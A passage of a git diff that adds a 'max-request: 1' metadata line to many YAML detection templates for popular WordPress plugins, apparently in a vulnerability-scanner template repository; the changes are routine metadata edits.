 - https://wordpress.org/plugins/gtranslate/
 metadata:
+ max-request: 1
 plugin_namespace: gtranslate
 wpscan: https://wpscan.com/plugin/gtranslate
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/gutenberg/
 metadata:
+ max-request: 1
 plugin_namespace: gutenberg
 wpscan: https://wpscan.com/plugin/gutenberg
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/happy-elementor-addons/
 metadata:
+ max-request: 1
 plugin_namespace: happy-elementor-addons
 wpscan: https://wpscan.com/plugin/happy-elementor-addons
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
index a8eca7b056..2409c6b370 100644
--- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
+++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/header-and-footer-scripts/
 metadata:
+ max-request: 1
 plugin_namespace: header-and-footer-scripts
 wpscan: https://wpscan.com/plugin/header-and-footer-scripts
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/header-footer-code-manager/
 metadata:
+ max-request: 1
 plugin_namespace: header-footer-code-manager
 wpscan: https://wpscan.com/plugin/header-footer-code-manager
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/header-footer-elementor/
 metadata:
+ max-request: 1
 plugin_namespace: header-footer-elementor
 wpscan: https://wpscan.com/plugin/header-footer-elementor
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/header-footer/
 metadata:
+ max-request: 1
 plugin_namespace: header-footer
 wpscan: https://wpscan.com/plugin/header-footer
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/health-check/
 metadata:
+ max-request: 1
 plugin_namespace: health-check
 wpscan: https://wpscan.com/plugin/health-check
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/hello-dolly/
 metadata:
+ max-request: 1
 plugin_namespace: hello-dolly
 wpscan: https://wpscan.com/plugin/hello-dolly
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/host-webfonts-local/
 metadata:
+ max-request: 1
 plugin_namespace: host-webfonts-local
 wpscan: https://wpscan.com/plugin/host-webfonts-local
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/imagify/
 metadata:
+ max-request: 1
 plugin_namespace: imagify
 wpscan: https://wpscan.com/plugin/imagify
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/imsanity/
 metadata:
+ max-request: 1
 plugin_namespace: imsanity
 wpscan: https://wpscan.com/plugin/imsanity
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/insert-headers-and-footers/
 metadata:
+ max-request: 1
 plugin_namespace: insert-headers-and-footers
 wpscan: https://wpscan.com/plugin/insert-headers-and-footers
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 43cb2ab09c..c8acf8c625 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/instagram-feed/
 metadata:
+ max-request: 1
 plugin_namespace: instagram-feed
 wpscan: https://wpscan.com/plugin/instagram-feed
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/intuitive-custom-post-order/
 metadata:
+ max-request: 1
 plugin_namespace: intuitive-custom-post-order
 wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/iwp-client/
 metadata:
+ max-request: 1
 plugin_namespace: iwp-client
 wpscan: https://wpscan.com/plugin/iwp-client
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/jetpack-boost/
 metadata:
+ max-request: 1
 plugin_namespace: jetpack-boost
 wpscan: https://wpscan.com/plugin/jetpack-boost
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/jetpack/
 metadata:
+ max-request: 1
 plugin_namespace: jetpack
 wpscan: https://wpscan.com/plugin/jetpack
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/kadence-blocks/
 metadata:
+ max-request: 1
 plugin_namespace: kadence-blocks
 wpscan: https://wpscan.com/plugin/kadence-blocks
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/kirki/
 metadata:
+ max-request: 1
 plugin_namespace: kirki
 wpscan: https://wpscan.com/plugin/kirki
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/leadin/
 metadata:
+ max-request: 1
 plugin_namespace: leadin
 wpscan: https://wpscan.com/plugin/leadin
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/limit-login-attempts-reloaded/
 metadata:
+ max-request: 1
 plugin_namespace: limit-login-attempts-reloaded
 wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/limit-login-attempts/
 metadata:
+ max-request: 1
 plugin_namespace: limit-login-attempts
 wpscan: https://wpscan.com/plugin/limit-login-attempts
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/litespeed-cache/
 metadata:
+ max-request: 1
 plugin_namespace: litespeed-cache
 wpscan: https://wpscan.com/plugin/litespeed-cache
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/loco-translate/
 metadata:
+ max-request: 1
 plugin_namespace: loco-translate
 wpscan: https://wpscan.com/plugin/loco-translate
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/loginizer/
 metadata:
+ max-request: 1
 plugin_namespace: loginizer
 wpscan: https://wpscan.com/plugin/loginizer
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 6f06b49011..1c16a72d76 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/loginpress/
 metadata:
+ max-request: 1
 plugin_namespace: loginpress
 wpscan: https://wpscan.com/plugin/loginpress
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/mailchimp-for-woocommerce/
 metadata:
+ max-request: 1
 plugin_namespace: mailchimp-for-woocommerce
 wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/mailchimp-for-wp/
 metadata:
+ max-request: 1
 plugin_namespace: mailchimp-for-wp
 wpscan: https://wpscan.com/plugin/mailchimp-for-wp
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/mailpoet/
 metadata:
+ max-request: 1
 plugin_namespace: mailpoet
 wpscan: https://wpscan.com/plugin/mailpoet
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/maintenance/
 metadata:
+ max-request: 1
 plugin_namespace: maintenance
 wpscan: https://wpscan.com/plugin/maintenance
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/mainwp-child/
 metadata:
+ max-request: 1
 plugin_namespace: mainwp-child
 wpscan: https://wpscan.com/plugin/mainwp-child
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/malcare-security/
 metadata:
+ max-request: 1
 plugin_namespace: malcare-security
 wpscan: https://wpscan.com/plugin/malcare-security
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/megamenu/
 metadata:
+ max-request: 1
 plugin_namespace: megamenu
 wpscan: https://wpscan.com/plugin/megamenu
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/members/
 metadata:
+ max-request: 1
 plugin_namespace: members
 wpscan: https://wpscan.com/plugin/members
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/meta-box/
 metadata:
+ max-request: 1
 plugin_namespace: meta-box
 wpscan: https://wpscan.com/plugin/meta-box
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 8e1cb46cf0..8881e23860 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/ml-slider/
 metadata:
+ max-request: 1
 plugin_namespace: ml-slider
 wpscan: https://wpscan.com/plugin/ml-slider
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/newsletter/
 metadata:
+ max-request: 1
 plugin_namespace: newsletter
 wpscan: https://wpscan.com/plugin/newsletter
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/nextend-facebook-connect/
 metadata:
+ max-request: 1
 plugin_namespace: nextend-facebook-connect
 wpscan: https://wpscan.com/plugin/nextend-facebook-connect
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/nextgen-gallery/
 metadata:
+ max-request: 1
 plugin_namespace: nextgen-gallery
 wpscan: https://wpscan.com/plugin/nextgen-gallery
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/ninja-forms/
 metadata:
+ max-request: 1
 plugin_namespace: ninja-forms
 wpscan: https://wpscan.com/plugin/ninja-forms
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/ocean-extra/
 metadata:
+ max-request: 1
 plugin_namespace: ocean-extra
 wpscan: https://wpscan.com/plugin/ocean-extra
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/official-facebook-pixel/
 metadata:
+ max-request: 1
 plugin_namespace: official-facebook-pixel
 wpscan: https://wpscan.com/plugin/official-facebook-pixel
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/one-click-demo-import/
 metadata:
+ max-request: 1
 plugin_namespace: one-click-demo-import
 wpscan: https://wpscan.com/plugin/one-click-demo-import
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/optinmonster/
 metadata:
+ max-request: 1
 plugin_namespace: optinmonster
 wpscan: https://wpscan.com/plugin/optinmonster
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index c45ef4bf89..0bc823830f 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/otter-blocks/
 metadata:
+ max-request: 1
 plugin_namespace: otter-blocks
 wpscan: https://wpscan.com/plugin/otter-blocks
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/password-protected/
 metadata:
+ max-request: 1
 plugin_namespace: password-protected
 wpscan: https://wpscan.com/plugin/password-protected
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/pdf-embedder/
 metadata:
+ max-request: 1
 plugin_namespace: pdf-embedder
 wpscan: https://wpscan.com/plugin/pdf-embedder
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml
index a224d85727..7fbeea5917 100644
--- a/http/technologies/wordpress/plugins/photo-gallery.yaml
+++ b/http/technologies/wordpress/plugins/photo-gallery.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/photo-gallery/
 metadata:
+ max-request: 1
 plugin_namespace: photo-gallery
 wpscan: https://wpscan.com/plugin/photo-gallery
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/pixelyoursite/
 metadata:
+ max-request: 1
 plugin_namespace: pixelyoursite
 wpscan: https://wpscan.com/plugin/pixelyoursite
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/polylang/
 metadata:
+ max-request: 1
 plugin_namespace: polylang
 wpscan: https://wpscan.com/plugin/polylang
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/popup-builder/
 metadata:
+ max-request: 1
 plugin_namespace: popup-builder
 wpscan: https://wpscan.com/plugin/popup-builder
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/popup-maker/
 metadata:
+ max-request: 1
 plugin_namespace: popup-maker
 wpscan: https://wpscan.com/plugin/popup-maker
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/post-smtp/
 metadata:
+ max-request: 1
 plugin_namespace: post-smtp
 wpscan: https://wpscan.com/plugin/post-smtp
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/post-types-order/
 metadata:
+ max-request: 1
 plugin_namespace: post-types-order
 wpscan: https://wpscan.com/plugin/post-types-order
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/premium-addons-for-elementor/
 metadata:
+ max-request: 1
 plugin_namespace: premium-addons-for-elementor
 wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
 tags: tech,wordpress,wp-plugin,top-100,top-200
